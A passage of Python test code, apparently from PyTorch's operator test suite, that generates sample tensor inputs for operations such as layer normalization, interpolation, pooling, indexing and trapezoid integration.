        ((0, 1), (1,), {}),
    )

    for input_shape, normalized_shape, kwargs in cases:
        # Shape of weight and bias should be the same as normalized_shape
        weight = make_arg(normalized_shape)
        bias = make_arg(normalized_shape)
        yield SampleInput(
            make_arg(input_shape),
            args=(normalized_shape, weight, bias),
            kwargs=kwargs
        )
    # Without any optional args
    yield SampleInput(make_arg((1, 2)), args=((2,),))

    # TODO: @krshrimali, once to_numpy method in SampleInput class is modified to take None inputs,
    # enable these inputs; see https://github.com/pytorch/pytorch/pull/63276#discussion_r691950400
    # With weight and a `None` bias
    # yield SampleInput(make_arg((1, 2)), args=((2,), make_arg((2,)), None))

    # With `None` weight and bias (tests failing for this, see the link above)
    # yield SampleInput(make_arg((1, 2)), args=((2,), None, make_arg((2,))))

def sample_inputs_local_response_norm(opinfo, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Ordered as input shape, size and a kwarg dict for alpha, beta, and k
    cases: Tuple[Tuple[int], Tuple[int], dict] = (  # type: ignore[assignment]
        ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
        ((1, 6, 3), 2, {'beta': 0.5, 'k': 1.25}),
        ((1, 6, 3), 2, {'alpha': 3e-05, 'k': 1.25}),
        ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5}),
        ((1, 6, 3), 2, {'alpha': 3e-05}),
        ((1, 6, 3), 2, {'beta': 0.5}),
        ((1, 6, 3), 2, {'k': 1.25}),
        ((1, 6, 3), 2, {}),
        ((2, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
        ((1, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
        ((0, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}),
    )

    for input_shape, size, kwargs in cases:
        yield SampleInput(make_arg(input_shape), args=(size,), kwargs=kwargs)

def sample_inputs_hardswish(self, device, dtype, requires_grad, **kwargs):
    N = 5
    # make sure we are testing -3 -> 3 range. default is -10 -> 10 so maybe unnecessary ?
    tensors = [SampleInput(make_tensor((N * 2, N * 2), device=device, dtype=dtype,
               requires_grad=requires_grad, low=-5, high=5)) for _ in range(1, N)]
    return tensors

def sample_inputs_linear(self, device, dtype, requires_grad, **kwargs):
    features_options = [[3, 4], [8, 8]]
    batch_options: List[List[int]] = [
        [],  # no batch
        [0],
        [8],
        [2, 3],
    ]
    create_tensor = partial(make_tensor, device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-2, high=2)

    sample_inputs = []
    for has_bias, (in_feat, out_feat), batch_shape in \
            itertools.product([True, False], features_options, batch_options):
        input_tensor = create_tensor(batch_shape + [in_feat])
        weight = create_tensor([out_feat, in_feat])
        if not has_bias:
            sample_inputs.append(SampleInput(input_tensor, args=(weight,)))
            continue

        bias = create_tensor([out_feat])
        sample_inputs.append(SampleInput(input_tensor, args=(weight, bias)))
    return sample_inputs

def sample_inputs_bilinear(self, device, dtype, requires_grad, **kwargs):
    features_options = [[3, 4, 5], [8, 8, 8]]
    batch_options: List[List[int]] = [
        [],  # no batch
        [0],
        [8],
        [2, 3],
    ]
    create_tensor = partial(make_tensor, device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-2, high=2)

    sample_inputs = []
    for has_bias, (in_feat1, in_feat2, out_feat), batch_shape in \
            itertools.product([True, False], features_options, batch_options):
        input_tensor1 = create_tensor(batch_shape + [in_feat1])
        input_tensor2 = create_tensor(batch_shape + [in_feat2])
        weight = create_tensor([out_feat, in_feat1, in_feat2])
        if not has_bias:
            sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight,)))
            continue
        bias = create_tensor([out_feat])
        sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight, bias)))

    return sample_inputs
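# Quick shape sketch (hypothetical helper) for the bilinear samples above:
# F.bilinear maps (..., in1) x (..., in2) -> (..., out) using a weight of
# shape (out, in1, in2) and an optional (out,) bias.
def _demo_bilinear_shapes():
    import torch.nn.functional as F
    x1, x2 = torch.randn(8, 3), torch.randn(8, 4)
    weight, bias = torch.randn(5, 3, 4), torch.randn(5)
    return F.bilinear(x1, x2, weight, bias).shape  # torch.Size([8, 5])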
def sample_inputs_glu(self, device, dtype, requires_grad, **kwargs):
    features_options = [[2], [2, 4], [8, 8], [3, 6, 8], [1, 4, 6, 7]]
    batch_options: List[List[int]] = [
        [],  # no batch
        [0],
        [8],
        [2, 3],
    ]
    create_tensor = partial(make_tensor, device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-2, high=2)

    sample_inputs = []
    for features, batch_shape in itertools.product(features_options, batch_options):
        ndim = len(features) + len(batch_shape)
        for dim in range(ndim):
            input_tensor = create_tensor(batch_shape + features)
            dim_size = input_tensor.size(dim)
            if dim_size > 0 and dim_size % 2 == 0:
                sample_inputs.append(SampleInput(input_tensor, args=(dim,)))

    return sample_inputs

def sample_inputs_interpolate(mode, self, device, dtype, requires_grad, **kwargs):
    N, C = 2, 3
    D = 4
    S = 3
    L = 5

    align_corners_options: Tuple[Any, ...] = (None,)
    if mode in ('linear', 'bilinear', 'bicubic', 'trilinear'):
        align_corners_options = (True, False, None)
    ranks_for_mode = {
        'nearest': [1, 2, 3],
        'linear': [1],
        'bilinear': [2],
        'bicubic': [2],
        'trilinear': [3],
        'area': [1, 2, 3]
    }

    def shape(size, rank, with_batch_channel=True):
        if with_batch_channel:
            return tuple([N, C] + ([size] * rank))
        return tuple([size] * rank)

    make_arg = partial(make_tensor, device=device, dtype=dtype,
                       requires_grad=requires_grad, low=-1, high=1)

    sample_inputs = []
    for align_corners in align_corners_options:
        for rank in ranks_for_mode[mode]:
            sample_inputs.extend([
                SampleInput(make_arg(shape(D, rank)),
                            args=(shape(S, rank, False), None, mode, align_corners)),
                SampleInput(make_arg(shape(D, rank)),
                            args=(shape(L, rank, False), None, mode, align_corners)),
                SampleInput(make_arg(shape(D, rank)),
                            args=(None, 1.7, mode, align_corners)),
                SampleInput(make_arg(shape(D, rank)),
                            args=(None, 0.6, mode, align_corners)),
            ])

    return sample_inputs

def sample_inputs_upsample(mode, self, device, dtype, requires_grad, **kwargs):
    N, C = 2, 3
    D = 4
    S = 3
    L = 5

    ranks_for_mode = {
        'nearest': [1, 2, 3],
        'bilinear': [2],
    }

    def shape(size, rank, with_batch_channel=True):
        if with_batch_channel:
            return tuple([N, C] + ([size] * rank))
        return tuple([size] * rank)

    make_arg = partial(make_tensor, device=device, dtype=dtype,
                       requires_grad=requires_grad, low=-1, high=1)

    sample_inputs = []
    for rank in ranks_for_mode[mode]:
        sample_inputs.extend([
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(S, rank, False))),
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(L, rank, False))),
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=1.7)),
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=0.6)),
        ])

    return sample_inputs

def sample_inputs_gelu(self, device, dtype, requires_grad, **kwargs):
    N = 5
    tensors = []
    for _ in range(1, N):
        for approximate in ['none', 'tanh']:
            tensors.append(SampleInput(
                make_tensor((N * 2, N * 2), device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-3, high=3),
                kwargs=dict(approximate=approximate)))
    return tensors

def sample_inputs_max_min_reduction_with_dim(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    args_for_reduction_with_dim = (
        ((S, S, S), (1,),),
        ((S, S, S), (1, True, ),),
        ((), (0,),),
        ((), (0, True,),),
    )
    inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device,
                                           low=None, high=None,
                                           requires_grad=requires_grad),
                               args=args,))
                  for input_tensor, args in args_for_reduction_with_dim)
    return inputs

def sample_inputs_max_min_reduction_no_dim(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    inputs.append(SampleInput(make_tensor((S, S, S), dtype=dtype, device=device,
                                          low=None, high=None,
                                          requires_grad=requires_grad),))
    inputs.append(SampleInput(make_tensor((), dtype=dtype, device=device,
                                          low=None, high=None,
                                          requires_grad=requires_grad),))
    return inputs

def _generate_nan_reduction_inputs(device, dtype, requires_grad, **kwargs):
    yield from _generate_reduction_inputs(device, dtype, requires_grad)
    yield torch.tensor([2, torch.nan, -1], device=device, dtype=dtype, requires_grad=requires_grad)
    yield torch.tensor([[torch.nan, 2], [0, 1]], device=device, dtype=dtype, requires_grad=requires_grad)

def sample_inputs_nan_reduction(supports_multiple_dims):
    # Generates sample inputs for reduction ops that contain the input tensor
    # and dim and keepdim kwargs. If a reduction op needs to test additional
    # args/kwargs then create a separate sample_inputs function
    def fn(op_info, device, dtype, requires_grad, **kwargs):
        inputs = []

        for t in _generate_nan_reduction_inputs(device, dtype, requires_grad):
            # Add case without dim and keepdim kwargs
            inputs.append(SampleInput(t.clone().requires_grad_(requires_grad)))
            for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims):
                inputs.append(SampleInput(t.clone().requires_grad_(requires_grad),
                                          kwargs=kwargs))

        return inputs

    return fn

def sample_inputs_reduction_quantile(op_info, device, dtype, requires_grad, **kwargs):
    test_quantiles = (0.5, make_tensor((2,), dtype=dtype, device=device, low=0, high=1,
                                       requires_grad=requires_grad))
    test_interpolations = ['linear', 'midpoint']

    inputs = []
    for quantiles in test_quantiles:
        for t in _generate_reduction_inputs(device, dtype, requires_grad):
            # Add case without dim and keepdim kwargs
            inputs.append(SampleInput(t.clone().requires_grad_(requires_grad),
                                      args=(quantiles,)))
            for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims=False):
                # Interpolation kwarg for now is only supported when providing both dim and keepdim
                kwargs.setdefault('dim', 0)
                kwargs.setdefault('keepdim', False)
                for interpolation in test_interpolations:
                    kwargs['interpolation'] = interpolation
                    inputs.append(SampleInput(t.clone().requires_grad_(requires_grad),
                                              args=(quantiles,), kwargs=kwargs))

    return inputs

def sample_inputs_reduction_count_nonzero(*args, **kwargs):
    """Sample inputs for count_nonzero"""
    # count_nonzero does not support keepdim yet
    for sample in sample_inputs_reduction(*args, **kwargs):
        sample.kwargs.pop('keepdim', None)
        yield sample

def sample_inputs_leaky_relu(op_info, device, dtype, requires_grad, **kwargs):
    N = 10
    tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype,
               requires_grad=requires_grad)) for _ in range(1, N)]
    return tensors
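# Hypothetical sketch for the quantile samples above: `interpolation` only
# changes the result when the requested quantile falls between two data
# points.
def _demo_quantile_interpolation():
    t = torch.tensor([1., 2., 3., 4.])
    lin = torch.quantile(t, 0.5, interpolation='linear')    # 2.5
    low = torch.quantile(t, 0.5, interpolation='lower')     # 2.0
    mid = torch.quantile(t, 0.5, interpolation='midpoint')  # 2.5
    return lin, low, mid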
def sample_inputs_fractional_max_pool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size
    cases = (((1, 3, 9, 9), 3),
             ((1, 3, 9, 9), (4, 4)),
             ((1, 3, 9, 9), (6, 6)),
             ((2, 3, 9, 9), (3, 3)),
             ((1, 1, 4, 4), (2, 2)),
             ((1, 2, 6, 6), (4, 4)))

    samples = []

    for input_shape, kernel_size in cases:
        for return_indices in [False, True]:
            # test case passing a single output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2), return_indices=return_indices)
            ))

            # test case passing a tuple output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2, 3), return_indices=return_indices)
            ))

            # test case passing an output ratio
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_ratio=(0.5, 0.5), return_indices=return_indices)
            ))

    return samples

def sample_inputs_fractional_max_pool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size
    cases = (((2, 3, 5, 5, 5), (2, 2, 2)),
             ((1, 2, 6, 5, 4), 2),
             ((1, 2, 5, 6, 5), (2, 3, 2)),
             ((1, 2, 6, 6, 6), (2, 3, 2)),
             ((1, 1, 7, 6, 7), (2, 3, 4)),
             ((1, 1, 4, 5, 4), (2, 2, 1)),
             ((1, 1, 8, 7, 6), (4, 3, 2)),
             ((0, 1, 4, 5, 4), (2, 2, 1)))

    samples = []

    for input_shape, kernel_size in cases:
        for return_indices in [False, True]:
            # test case passing a single output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2), return_indices=return_indices)
            ))

            # test case passing a tuple output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2, 3, 2), return_indices=return_indices)
            ))

            # test case passing an output ratio
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_ratio=(0.5, 0.5, 0.5), return_indices=return_indices)
            ))

    return samples

def sample_inputs_avgpool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override
    cases = (((1, 3, 9, 9), 3, 1, 1, True, False, 2),
             ((1, 3, 9, 9), (4, 4), (2, 3), 1, True, False, 2),
             ((1, 3, 9, 9), (6, 6), (3, 3), (2, 3), True, True, 2),
             ((2, 3, 9, 9), (3, 3), (1, 1), (1, ), True, False, 2),
             ((1, 1, 4, 4), (2, 2), (), (0, ), False, True, -2),
             ((1, 2, 6, 6), (4, 4), (2, 2), (2, ), True, True, None))

    for input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override in cases:
        yield SampleInput(make_arg(input_shape),
                          args=(kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override))
    # Case with just input_shape and kernel_size
    yield SampleInput(make_arg((1, 3, 9, 9)), args=((3, 3)))

def sample_inputs_avgpool1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size, kwargs
    cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [
        ((2, 3, 9), (3,), dict()),
        ((1, 3, 9), 3, dict(stride=1, padding=1, ceil_mode=True, count_include_pad=False)),
        ((1, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=True, count_include_pad=True)),
        ((2, 3, 9), (3,), dict(stride=(1,), padding=(1,), ceil_mode=False, count_include_pad=True)),
        ((0, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=False, count_include_pad=True)),
        ((1, 2, 9), (7,), dict(stride=(3,), padding=(2,), ceil_mode=False)),
        ((1, 2, 9), (7,), dict(stride=(3,), padding=(3,), ceil_mode=True)),
        ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=False)),
        ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=True)),
    ]

    for input_shape, kernel_size, kwargs in cases:
        yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs)

def sample_inputs_avgpool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size, kwargs
    # (kwargs may carry stride, padding, ceil_mode, count_include_pad, divisor_override)
    cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [
        ((2, 3, 3, 4, 4), (2, 2, 2), dict()),
        ((1, 2, 4, 4, 4), 2, dict(stride=1, padding=1, ceil_mode=True,
                                  count_include_pad=False, divisor_override=2)),
        ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=True,
                                          count_include_pad=True, divisor_override=2)),
        ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=False)),
        ((1, 1, 7, 5, 7), (6, 3, 4), dict(stride=(2, 3, 2), padding=(3, 1, 0), ceil_mode=False,
                                          count_include_pad=False, divisor_override=2)),
        ((1, 1, 4, 5, 4), (2, 2, 3), dict(stride=(2, 2, 1), padding=0, ceil_mode=False,
                                          count_include_pad=True, divisor_override=-2)),
        ((1, 1, 6, 5, 6), (4, 5, 6), dict(stride=(2, 3, 2), padding=2, ceil_mode=True,
                                          count_include_pad=True, divisor_override=None)),
        ((0, 1, 4, 5, 4), (2, 3, 1), dict(stride=(2, 1, 2), padding=0, ceil_mode=False,
                                          count_include_pad=True, divisor_override=None)),
    ]

    for input_shape, kernel_size, kwargs in cases:
        yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs)

def sample_inputs_topk(op_info, device, dtype, requires_grad, **kwargs):
    def get_tensor_input(size):
        return make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad)

    inputs = []
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3,)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True, True)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True, True)))

    inputs.append(SampleInput(get_tensor_input(()), args=(1,)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, 0)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, -1)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True, True)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True, True)))

    return inputs

def sample_inputs_outer(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    arg_a = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad)
    arg_b = make_tensor((M,), dtype=dtype, device=device, requires_grad=requires_grad)
    inputs.append(SampleInput(arg_a, args=(arg_b,)))
    return inputs

def sample_inputs_dist(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    sizes = ((S, S, S), (S,), (S, 1, S), (), (S, S))
    ps = (2, 4)

    for size_x, size_y, p in product(sizes, sizes, ps):
        yield SampleInput(make_arg(size_x), args=(make_arg(size_y), p))

# Missing to test the nondeterminism of the operation
# https://github.com/pytorch/pytorch/issues/53352
def sample_inputs_index(op_info, device, dtype, requires_grad, **kwargs):
    # target.index_select(dim, idx)
    select = op_info.name == "index_select"
    # target.index_add(dim, idx, source, *, alpha=1)
    add = op_info.name == "index_add"
    # target.index_copy(dim, idx, source)
    copy = op_info.name == "index_copy"
    # target.index_fill(dim, idx, value)
    fill = op_info.name == "index_fill"

    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    make_permutation = partial(torch.randperm, device=device, dtype=torch.int64)

    def make_idx(n):
        return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=n)

    shapes = [(), (1,), (S, S)]
    # extra parameter for add
    alphas = (-1, 0, 2) if add else (None,)

    for shape, alpha in product(shapes, alphas):
        t = make_arg(shape)
        args = []

        # dim. We handle the scalar case
        dim = 1 if t.ndim == 2 else 0
        args.append(dim)

        # idx They need to be different for copy and add to be deterministic
        make_idx_fn = make_permutation if copy or add else make_idx
        idx = make_idx_fn(t.shape[dim] if t.ndim != 0 else 1)
        args.append(idx)

        # source
        if copy or add:
            args.append(make_arg(shape))
        elif fill:
            # A weird number to catch errors
            args.append(make_arg((1,)).item())

        args = tuple(args)
        kwargs = {} if alpha is None else {"alpha": alpha}

        yield SampleInput(t, args=args, kwargs=kwargs)

def sample_inputs_index_reduce(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    def make_idx(n, m):
        return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=m)

    shapes = [((), ()), ((1,), (1,)), ((S, S), (S, M)), ((S, S, S), (S, M, S))]
    include_selfs = (True, False)
    reduces = ('prod', 'mean', 'amin', 'amax')

    for shape, include_self, reduce in product(shapes, include_selfs, reduces):
        self_shape, src_shape = shape
        # dim. We handle the scalar case
        dim = 1 if len(self_shape) >= 2 else 0
        idx = make_idx(src_shape[dim] if len(src_shape) != 0 else 1,
                       self_shape[dim] if len(self_shape) != 0 else 1)
        args = (dim, idx, make_arg(src_shape), reduce)
        yield SampleInput(make_arg(self_shape),
                          args=args,
                          kwargs={'include_self' : include_self})

    # Sample inputs to test edge cases for backward
    if requires_grad:
        # Check that gradients are propagated correctly for prod when zeros in self/src are reduced
        # This sample tests gradients for the following cases
        # (a) 1 zero reduced (from source (self[0, 1]), from self (self[0, 0]))
        # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0], self[1, 1])
        # (c) no zeros reduced (self[2, 1], self[2, 2])
        # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py
        #     test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad
        input = torch.tensor([[0, 13], [0, 0], [15, 19]], dtype=dtype, device=device,
                             requires_grad=requires_grad)
        src = torch.tensor([[2, 0], [0, 0], [2, 3], [2, 2]], dtype=dtype, device=device,
                           requires_grad=requires_grad)
        idx = torch.tensor([0, 1, 2, 0], dtype=torch.long, device=device)

        yield SampleInput(input,
                          args=(0, idx, src, 'prod'),
                          kwargs={'include_self': True})

def sample_inputs_mode(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    args = (
        ((S, S, S), (),),
        ((S, S, S), (1, ),),
        ((S, S, S), (1, True, ),),
        ((), (),),
        ((), (0,),),
        ((), (0, True,),),
    )
    inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device,
                                           low=None, high=None,
                                           requires_grad=requires_grad),
                               args=args,))
                  for input_tensor, args in args)
    return inputs

# Missing to test the nondeterminism of the operation
# https://github.com/pytorch/pytorch/issues/53352
def sample_inputs_put(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False)

    S = 3

    # Generic inputs
    idx = torch.randperm(S * S, device=device, dtype=torch.int64)[:S]
    idx_list = [idx, -idx - 1]
    for idx, acc in product(idx_list, (True, False)):
        yield SampleInput(input=make_arg((S, S)),
                          args=(idx.clone(), make_arg((S,)), acc))

    # Scalar cases
    scalar_sizes = [(), (1,)]
    tgt_gen = (make_arg(size) for size in scalar_sizes)
    idx_gen = (make_idx(size,
high=1) for size in scalar_sizes)
    src_gen = (make_arg(size) for size in scalar_sizes)
    for tgt, idx, src, acc in product(tgt_gen, idx_gen, src_gen, (True, False)):
        yield SampleInput(input=tgt.clone().requires_grad_(requires_grad),
                          args=(idx.clone(), src.clone().requires_grad_(requires_grad), acc))

    # Empty cases
    tgt_sizes = [(0,), (), (1,), (3, 2)]
    tgt_gen = (make_arg(size) for size in tgt_sizes)
    idx = make_idx((0,), high=1)
    src = make_arg((0,))
    for tgt, acc in product(tgt_gen, (True, False)):
        yield SampleInput(input=tgt.clone().requires_grad_(requires_grad),
                          args=(idx.clone(), src.clone().requires_grad_(requires_grad), acc))

def sample_inputs_take(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False)

    S = 3

    # Generic inputs: take S elements out of S * S
    index = make_idx((S,), high=(S * S))
    for idx in (index, -index - 1):
        yield SampleInput(input=make_arg((S, S)), args=(idx,))

    # Scalar cases
    scalar_sizes = [(), (1,)]
    src_gen = (make_arg(size) for size in scalar_sizes)
    idx_gen = (make_idx(size, high=1) for size in scalar_sizes)
    for src, idx in product(src_gen, idx_gen):
        yield SampleInput(input=src.clone().requires_grad_(requires_grad),
                          args=(idx.clone(),))

    # Empty cases
    src_sizes = [(0,), (), (1,), (3, 2)]
    src_gen = (make_arg(size) for size in src_sizes)
    idx = make_idx((0,), high=1)
    for src in src_gen:
        yield SampleInput(input=src.clone().requires_grad_(requires_grad),
                          args=(idx.clone(),))

def sample_movedim_moveaxis(op_info, device, dtype, requires_grad, **kwargs):
    return (
        SampleInput(
            make_tensor((4, 3, 2, 1), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=([0, 1, 2, 3], [3, 2, 1, 0])),
        SampleInput(
            make_tensor((4, 3, 2, 1), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=([0, -1, -2, -3], [-3, -2, -1, -0]))
    )

def sample_repeat_tile(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    rep_dims = ((), (0, ), (1, ), (0, 2), (1, 1), (2, 3), (2, 3, 2), (0, 2, 3), (2, 1, 1, 1),)
    shapes = ((), (0,), (2,), (3, 0), (3, 2), (3, 0, 1))

    if requires_grad:
        # Tests for variant_consistency_jit, grad, gradgrad
        # are slower. Use smaller bags of `rep_dims` and `shapes`
        # in this case.
        rep_dims = ((), (0, ), (0, 2), (1, 1), (2, 3), (1, 3, 2), (3, 1, 1))  # type: ignore[assignment]
        shapes = ((), (0,), (2,), (3, 2))  # type: ignore[assignment]

    samples = []
    for rep_dim, shape in product(rep_dims, shapes):
        # `torch.repeat` errors for `len(rep_dims) < t.dim()`,
        # so we filter such combinations.
if op_info.name == 'repeat' and len(rep_dim) < len(shape): continue samples.append(SampleInput(make_arg(shape), args=(rep_dim,),)) return samples def sample_inputs_narrow(op_info, device, dtype, requires_grad, **kwargs): shapes_and_args = ( ((S, S, S), (1, 2, 2)), ((S, S, S), (-1, 2, 2)), ((S, S, S), (1, 0, 0)), ((S, S, S), (-1, 0, 0)), ((S, S, S), (2, 1, 2)), ) for shape, args in shapes_and_args: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) yield SampleInput(tensor, args=args) def sample_trapezoid(op_info, device, dtype, requires_grad, **kwargs): y_shape_x_shape_and_kwargs = [ ((2, 3), (2, 3), {}), ((2, 3), (2, 3), {'dim': 1}), ((6,), (6,), {}), ((6,), None, {}), # When 'trapezoid' is called with an empty input, it does not produce an output with requires_grad # See Issue #{61619} # ((6,0), (6,0), {}), ((2, 3), (1, 3), {}), ((3, 3), (3, 3), {}), ((3, 3), (3, 3), {'dim': -2}), ((5,), None, {'dx': 2.0}), ((2, 2), None, {'dx': 3.0}) ] samples = [] for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs: y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if x_shape is not None: x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg)) else: samples.append(SampleInput(y_tensor, kwargs=kwarg)) return samples def sample_cumulative_trapezoid(op_info, device, dtype, requires_grad, **kwargs): y_shape_x_shape_and_kwargs = [ ((2, 3), (2, 3), {}), ((2, 3), (2, 3), {'dim': 1}), ((6,), (6,), {}), ((6,), None, {}), # When 'cumulative_trapezoid' is called with an empty input, it does not produce an output with requires_grad # See Issue #{61619} # ((6,0), (6,0), {}), ((2, 3), (1, 3), {}), ((3, 3), (3, 3), {}), ((3, 3), (3, 3), {'dim': -2}), ((5,), None, {'dx': 2.0}), ((2, 2), None, {'dx': 3.0}) ] samples = [] for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs: y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if x_shape is not None: x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg)) else: samples.append(SampleInput(y_tensor, kwargs=kwarg)) return samples def sample_unsqueeze(op_info, device, dtype, requires_grad, **kwargs): shapes_and_axes = [ ((3, 4, 5), 0), ((3, 4, 5), 1), ((3, 4, 5), 3), ((3, 4, 5), -1), ((3, 4, 5), -3), ((), 0), ((), -1), ((1,), 0), ((1,), -1), ] samples = [] for shape, axis in shapes_and_axes: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(tensor, args=(axis,),)) return samples def sample_inputs_nn_unfold(op_info, device, dtype, requires_grad, **kwargs): shapes = ((0, 1, 5, 5), (1, 1, 5, 5), (2, 3, 5, 5)) kernel_sizes = (2, (2, 2), (3, 3)) dilations = (1, 2, (1, 2)) paddings = (0, 1, (1, 1)) strides = (1, 2, (1, 2)) cases = product(shapes, kernel_sizes, dilations, paddings, strides) for shape, kernel_size, dilation, padding, stride in cases: tensor = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(tensor, args=(kernel_size, dilation, padding, stride)) # With default args yield SampleInput(make_tensor((1, 1, 5, 5), dtype=dtype, device=device, requires_grad=requires_grad), args=((3, 3),)) def sample_inputs_squeeze(op_info, 
